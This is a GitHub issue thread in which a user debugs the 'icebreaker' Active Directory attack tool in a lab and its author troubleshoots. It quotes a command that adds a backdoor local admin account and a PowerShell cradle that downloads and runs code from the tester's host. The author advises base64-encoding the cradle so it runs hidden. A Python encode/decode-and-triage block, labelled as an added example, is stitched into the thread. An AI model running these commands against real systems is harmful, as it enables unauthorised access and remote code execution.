DanMcInerney / icebreaker

Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment
MIT License

login after successful attack #4

Closed theoneandonly-vector closed 6 years ago

theoneandonly-vector commented 6 years ago

Hey there, it tells me it automatically created an account "icebreaker:P@ssword123456" but I somehow can't log in via psexec:

[*] 10.20.23.1:445 - Authenticating to 10.20.23.1:445 as user 'icebreaker'...
[*] 10.20.23.1:445 - Uploading payload...
[-] 10.20.23.1:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

It's the AD in my test environment.

DanMcInerney commented 6 years ago

Can you send me the ntlmrelayx.py output both before and after icebreaker said it added the new user?

theoneandonly-vector commented 6 years ago

ntlmrelayx.py.log: full log file

DanMcInerney commented 6 years ago

This is very odd. It looks like it should've successfully completed. Have you logged into the machine at .1 and confirmed icebreaker is not a user with net user? I can't find anything in the code that might be the cause here. Nor can I replicate it in any of my three labs.

theoneandonly-vector commented 6 years ago

I can log in and see a local user "icebreaker" but I can't remotely execute code as him via SMB; he has no admin permissions, no RDP etc.


DanMcInerney commented 6 years ago

Ah, interesting. OK so ntlmrelayx runs a command like this: net user icebreaker /add; net localgroup administrators /add icebreaker; <mimikatz/empire launcher code>. So my question is, did the script parse any mimikatz output or did you get an empire launcher if you ran it with --auto? Because I'm thinking the user that we hijacked the SMB connection from may not have had permissions to add a user to local admin (not sure how this would happen), or maybe the local administrators group was renamed? Or possibly an antivirus prevented the addition of the user to the local admins. Last possibility I can think of that might be the most likely is there's a GPO policy in place that overwrites the Administrators group to whatever is specified in the GPO.

theoneandonly-vector commented 6 years ago

AV is deactivated for this first test. I don't see any mimikatz output.

--auto just gives me an error... the submodule "empire" isn't set up correctly:

Traceback (most recent call last):
  File "empire", line 1360, in <module>
    main = empire.MainMenu(args=args)
  File "/opt/icebreaker/submodules/Empire/lib/common/empire.py", line 84, in __init__
    (self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList, self.obfuscate, self.obfuscateCommand) = helpers.get_config('rootuser, install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command')
  File "/opt/icebreaker/submodules/Empire/lib/common/helpers.py", line 554, in get_config
    cur.execute("ALTER TABLE config ADD COLUMN %s BLOB" % (field))
sqlite3.OperationalError: no such table: config

So DeathStar can't connect to it.

DanMcInerney commented 6 years ago

You must've cloned icebreaker in the short period of time yesterday that I was messing with Empire versions as that error you got was the same error I was getting off the Empire dev branch. It should be working now. But the fact you didn't see any mimikatz output points towards something happening mid-command execution. One thing to try is to copy the base64 value out of the ntlmrelayx command, then run it on the machine locally using: powershell -nop -exec bypass -enc . I suggest doing this without the --auto flag so you get just the mimikatz payload. This should give us the benefit of error messages if it fails which will help a lot in figuring this out.


theoneandonly-vector commented 6 years ago

New error occurred after reinstalling:

[*] Attack 4: NTLM relay with Responder and ntlmrelayx
[*] Running: python2 submodules/Responder/Responder.py -wrd -I enp0s3
Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 141, in _new_conn
    (self.host, self.port), self.timeout, **extra_kw)
  File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 83, in create_connection
    raise err
  File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 73, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 601, in urlopen
    chunked=chunked)
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 346, in _make_request
    self._validate_conn(conn)
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 850, in _validate_conn
    conn.connect()
  File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 284, in connect
    conn = self._new_conn()
  File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 150, in _new_conn
    self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTTPSConnection object at 0x7f01fafccd68>: Failed to establish a new connection: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 440, in send
    timeout=timeout
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python3.6/site-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7f01fafccd68>: Failed to establish a new connection: [Errno 111] Connection refused',))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "./icebreaker.py", line 1523, in <module>
    main(report, args)
  File "./icebreaker.py", line 1509, in main
    do_ntlmrelay(prev_creds, args, iface)
  File "./icebreaker.py", line 1214, in do_ntlmrelay
    resp_proc, ntlmrelay_proc = run_relay_attack(iface, args)
  File "./icebreaker.py", line 958, in run_relay_attack
    remote_cmd = run_empire_deathstar(iface, args)
  File "./icebreaker.py", line 1382, in run_empire_deathstar
    token = get_token(base_url)
  File "./icebreaker.py", line 1330, in get_token
    r = requests.post(base_url + '/api/admin/login', json=login_opts, verify=False)
  File "/usr/lib/python3.6/site-packages/requests/api.py", line 112, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/lib/python3.6/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 508, in send
    raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7f01fafccd68>: Failed to establish a new connection: [Errno 111] Connection refused',))

Command has been completed, press ENTER to exit the terminal.

theoneandonly-vector commented 6 years ago

And what does this mean exactly?

[*] Authenticating against ('SMB', '10.20.23.1', 445, '') as Domain\User SUCCEED
[*] username:hash
[*] Running: submodules/JohnTheRipper/run/john --format=netntlmv2 --wordlist=1mil-AD-passwords.txt /opt/icebreaker/hashes/NTLMv2-hashes-brhUwcU.txt --session=brhUwcU
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

theoneandonly-vector commented 6 years ago

Could you tell me how I can get a PowerShell Empire session through custom command execution, as the PowerShell one-liner it can generate has some problems:

[*] Executed specified command on host: 10.20.23.1
[-] 'ascii' codec can't encode character u'\ufffd' in position 309: ordinal not in range(128)

And web delivery also won't work:

./icebreaker.py -l /home/admin/Desktop/targets.txt -s dns -c "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.20.23.188:80/'))""
bash: syntax error near unexpected token `('

DanMcInerney commented 6 years ago

rpc_s_access_denied is an ntlmrelayx error but nothing to worry about; cmd exec will occur without it.

When you're doing the single command you're using double quotes twice. The command prompt is interpreting that as "powershell.exe -nop -w hidden -c" being one string, then "IEX ((new-object net.webclient).downloadstring('http://10.20.23.188:80/'))" as a second string. You'll need to escape the right quotes with \". I'll look into the right way to do it as soon as I can, probably in the next couple weeks, just a lil busy at the moment.


DanMcInerney commented 6 years ago

I misspoke earlier. The rpc_s_access_denied error occurs when you are relaying a user with non-admin rights on the target machine. Command exec will not occur in this situation. The error I was thinking of, which I keep seeing and which doesn't affect command execution, is "SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access flags are incompatible.)"

The error you're getting where it says connection refused could be a handful of things. I think the most likely is that the adapter it's using (enp0s3) is not the correct one. You'll want to use your main internet connection adapter. You can see a list of your adapters with ip a. You can specify this adapter with the -i option. But basically the error states that none of the tools are able to establish network connections to each other like DeathStar can't connect to the Empire API. If it's not the adapter then I'm not sure what it is except that it centers around your network connection and not being able to make any network connections.

As for your error trying to get an empire shell with -c, I didn't have any trouble in my tests just now. The \ufffd unicode character is the replacement character for when unicode doesn't have a code for the character. This shouldn't occur in the Empire powershell launcher commands as they're base64 encoded which only uses characters that unicode can interpret. Are you pasting the Empire powershell launcher into a different program, then copying it out of that program? It seems like an artifact from another program or you're copying too many characters when you copy the Empire launcher out of the terminal.

Last, your best bet for getting metasploit's web delivery to work is to base64 encode it first using https://raikia.com/tool-powershell-encoder/. So take IEX ((new-object net.webclient).downloadstring('http://10.20.23.188:80/'))...whatever else, base64 encode that using Powershell base64 encoding (different than regular base64 encoding, that raikia link will do it for you) then use the -c option like so: -c "powershell -nop -w hidden -enc <base64 encoded cmd>"

The reason you're having trouble with the MSF webshell delivery is because you have to account for the fact that any command you want to run using icebreaker is going through 3 different interpreters: first bash because we run it in a terminal, then python interprets it, then the Windows shell interprets it. Each of these has different special characters. You can mostly ignore the python interpreter because it's going to take the whole command as a string, but bash and Windows are gonna mess with it. Best to avoid special chars like (, ), !, ~, etc. entirely by base64 encoding the command.
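The encoding Dan describes above (UTF-16LE, then base64, which is why "PowerShell base64" differs from plain base64), as an added example that is not icebreaker's code or from the thread's authors. It encodes a command the way -EncodedCommand expects and, from the log-review side, pulls an encoded command back out of a recorded process command line and decodes it. The switch-name prefix matching and the ASCII-only NUL-byte heuristic are assumptions, noted in the comments.

```python
import base64
from typing import Optional

# Constructed sample command: the download cradle quoted in the thread. Its
# encoded form below is what the "-enc" advice produces for it.
CRADLE = "IEX ((new-object net.webclient).downloadstring('http://10.20.23.188:80/'))"


def encode_powershell_command(cmd: str) -> str:
    # powershell.exe -EncodedCommand expects base64 of the UTF-16LE bytes of the
    # command, not of its UTF-8 bytes. That is the "PowerShell base64 encoding"
    # the thread distinguishes from regular base64.
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64: str) -> Optional[str]:
    # Inverse of the above, as a log reviewer would run it on a recorded command
    # line. Returns None for blobs that are not valid base64 or that were not
    # UTF-16LE encoded (e.g. produced with plain base64 of UTF-8 text).
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    # Heuristic (assumption): commands are ASCII, so in UTF-16LE every high byte
    # is 0x00. Plain UTF-8 base64 fails this check instead of decoding to noise.
    if len(raw) == 0 or len(raw) % 2 or any(raw[1::2]):
        return None
    return raw.decode("utf-16-le")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    # Find the blob following an -EncodedCommand switch. Assumption: PowerShell
    # accepts any prefix of the switch name from "-e" upward (-e, -enc, -encoded),
    # the explicit short form -ec, and "/" in place of "-". Switches such as -exec
    # or -ExecutionPolicy do not match because "ex" is not a prefix of
    # "encodedcommand".
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t[:1] not in ("-", "/") or len(t) < 2:
            continue
        name = t[1:]
        if name == "ec" or "encodedcommand".startswith(name):
            return tokens[i + 1]
    return None


def triage(cmdline: str) -> dict:
    # One call for a detection pipeline: was an encoded command present, and
    # what did it say in plaintext?
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "decoded": None}
    return {"encoded": True, "decoded": decode_powershell_command(b64)}


# Constructed process command lines of the kind Sysmon Event ID 1 would record.
# The second uses plain UTF-8 base64, the mistake the thread warns about, so it
# decodes to nothing useful; the third carries no encoded command at all.
SAMPLE_CMDLINES = [
    "powershell -nop -w hidden -enc " + encode_powershell_command(CRADLE),
    "powershell -nop -w hidden -enc " + base64.b64encode(CRADLE.encode()).decode(),
    "powershell.exe -nop -exec bypass -File C:\\scripts\\inventory.ps1",
]
```

Running triage over the three samples returns the cradle in plaintext for the first, an encoded-but-undecodable result for the second (the symptom of using regular base64), and no encoded command for the third.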

DanMcInerney commented 6 years ago

I finally got your errors about the connection while testing. It happens when Empire is not done booting up the REST API and we try to call DeathStar. I will fix this today to give it better error handling.

DanMcInerney commented 6 years ago

So there doesn't seem to be an easy way of gracefully handling the connection errors DeathStar sends out if it tries to connect to Empire before the REST API is good to go. So I just increased the timeout between Empire starting up and DeathStar starting up which should fix it on everything but the absolute slowest of computers.

theoneandonly-vector commented 6 years ago

It somehow crashes directly when the attack starts (no timeout):

[*] Attack 4: NTLM relay with Responder and ntlmrelayx
[*] Running: python2 submodules/Responder/Responder.py -wrd -I enp0s3
Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 141, in _new_conn
    (self.host, self.port), self.timeout, **extra_kw)
  File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 83, in create_connection
    raise err
  File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 73, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 601, in urlopen
    chunked=chunked)
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 346, in _make_request
    self._validate_conn(conn)
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 850, in _validate_conn
    conn.connect()
  File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 284, in connect
    conn = self._new_conn()
  File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 150, in _new_conn
    self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTTPSConnection object at 0x7efec53336a0>: Failed to establish a new connection: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 440, in send
    timeout=timeout
  File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python3.6/site-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7efec53336a0>: Failed to establish a new connection: [Errno 111] Connection refused',))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "./icebreaker.py", line 1530, in <module>
    main(report, args)
  File "./icebreaker.py", line 1516, in main
    do_ntlmrelay(prev_creds, args, iface)
  File "./icebreaker.py", line 1221, in do_ntlmrelay
    resp_proc, ntlmrelay_proc = run_relay_attack(iface, args)
  File "./icebreaker.py", line 959, in run_relay_attack
    remote_cmd = run_empire_deathstar(iface, args)
  File "./icebreaker.py", line 1389, in run_empire_deathstar
    token = get_token(base_url)
  File "./icebreaker.py", line 1337, in get_token
    r = requests.post(base_url + '/api/admin/login', json=login_opts, verify=False)
  File "/usr/lib/python3.6/site-packages/requests/api.py", line 112, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/lib/python3.6/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 508, in send
    raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7efec53336a0>: Failed to establish a new connection: [Errno 111] Connection refused',))

DanMcInerney commented 6 years ago

Hmm yeah you're right. I'm not sure about this one. My main suspicion is that enp0s3 is the wrong interface. My VM will only bring up eth0 and lo interfaces and Responder works with lo so I'm not sure how to test with an incorrect interface. I tried running icebreaker with multiple responder programs running, but that didn't cause that error either. At this point I'd say try a different interface and let me know how that goes.

theoneandonly-vector commented 6 years ago

I have only these:

enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.20.23.188  netmask 255.255.255.0  broadcast 10.20.23.255
        inet6 fe80::8c80:2bed:1dc5:8582  prefixlen 64  scopeid 0x20
        ether 08:00:27:75:c8:a5  txqueuelen 1000  (Ethernet)
        RX packets 6499  bytes 9136163 (8.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2522  bytes 173337 (169.2 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 17  bytes 1497 (1.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17  bytes 1497 (1.4 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

DanMcInerney commented 6 years ago

Dang so that's not it. I'm a bit at a loss.
